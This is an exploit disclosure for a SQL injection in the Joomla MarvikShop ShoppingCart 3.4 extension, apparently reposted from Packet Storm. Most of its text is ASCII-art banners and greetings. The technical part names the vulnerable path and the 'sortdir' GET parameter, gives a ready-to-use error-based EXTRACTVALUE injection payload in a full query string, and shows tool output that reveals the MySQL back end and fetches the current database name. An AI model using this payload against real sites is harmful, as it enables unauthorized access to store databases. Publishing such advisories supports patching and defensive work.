Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a remote SQL injection vulnerability.
af41f883caada44f1dff993f8717a577f62a5db925c277a7fdd1059acaa38172┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : Team MarvikShop │
│ Software : Joomla MarvikShop ShoppingCart 3.4 │
│ Vuln Type: SQL Injection │
│ Method : GET │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise │
│ │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /en/index.php
GET parameter 'sortdir' is vulnerable
---
Parameter: sortdir (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)
Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25
---
[INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 7.1.33
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[INFO] fetching current database
current database: 'stenen_test'
[-] Done
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed